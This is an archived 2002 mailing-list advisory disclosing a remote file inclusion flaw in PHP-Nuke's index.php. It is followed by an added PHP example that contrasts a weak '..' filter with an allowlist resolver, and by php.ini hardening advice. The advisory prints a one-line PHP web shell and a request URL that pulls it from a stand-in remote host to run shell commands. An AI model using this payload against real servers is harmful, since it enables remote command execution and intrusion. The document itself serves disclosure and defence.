PHP-Nuke allows Command Execution & Much more

From: Handle Nopman (nopmanat_private)
Date: Wed Jan 16 2002 - 10:30:53 PST

    Hi All!
    
    I've found a serious security flaw in PHP-Nuke.
    It allows a user to execute any PHP code.
    
    The flaw is in the index.php's include file feature.
    It allows including files like index.php?file=file
    It prevents users from including ..'s in URLs, but
    it doesn't prevent users from entering http:// URLs.
    Remember the PHP's remote get feature...
    
    How to exploit:
    Upload this file to some free web space provider or
    setup your own server:
    <?php
    system($cmd);
    ?>
    Then just requesting http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
    will execute ls -al command.
    I will not upload the file anywhere to prevent too easy exploiting. (No script kiddies)
    
    Vendor status:
    I contacted the author on 28.12.2001 and he hasn't
    replied.
    
    Sincerely
    "Nopman"
    
    
    This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 16:32:45 PST
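
The filtering gap described in the post, shown from the fixing side. This is an added example, not part of the original message and not PHP-Nuke source: the function names, module names and temporary directory are hypothetical, and the inputs are constructed. It puts a check that only rejects ".." next to an allowlist resolver that never hands request data to include.

```php
<?php
// Added illustration; not PHP-Nuke code. All names below are hypothetical.

// The kind of check the post describes: it rejects ".." and nothing else,
// so a value that starts with a URL scheme passes.
function weak_is_allowed(string $file): bool
{
    return strpos($file, '..') === false;
}

// Hardened: the request value is only a key into a fixed allowlist.
const MODULES = ['news' => 'news.php', 'faq' => 'faq.php'];

function resolve_module(string $file, string $baseDir): ?string
{
    // Letters, digits and underscore only: no scheme, slash, dot or NUL byte.
    if (!preg_match('/\A[a-z0-9_]{1,32}\z/', $file) || !isset(MODULES[$file])) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . MODULES[$file]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: the resolved path must stay under the module directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed module directory so the example runs offline.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'modules_' . getmypid();
mkdir($dir);
foreach (MODULES as $name) {
    touch($dir . DIRECTORY_SEPARATOR . $name);
}

// Constructed request values, including the URL form from the post.
$samples = ['news', '../etc/passwd', 'http://where.the.bad.php.file.is/evil.php', 'faq.php'];
foreach ($samples as $s) {
    printf("%-44s weak=%-5s hardened=%s\n", $s,
        var_export(weak_is_allowed($s), true),
        resolve_module($s, $dir) === null ? 'rejected' : 'accepted');
}

// Clean up the constructed files.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

Independently of application code, setting `allow_url_fopen` (and, since PHP 5.2, `allow_url_include`) to Off in php.ini stops include from fetching remote URLs.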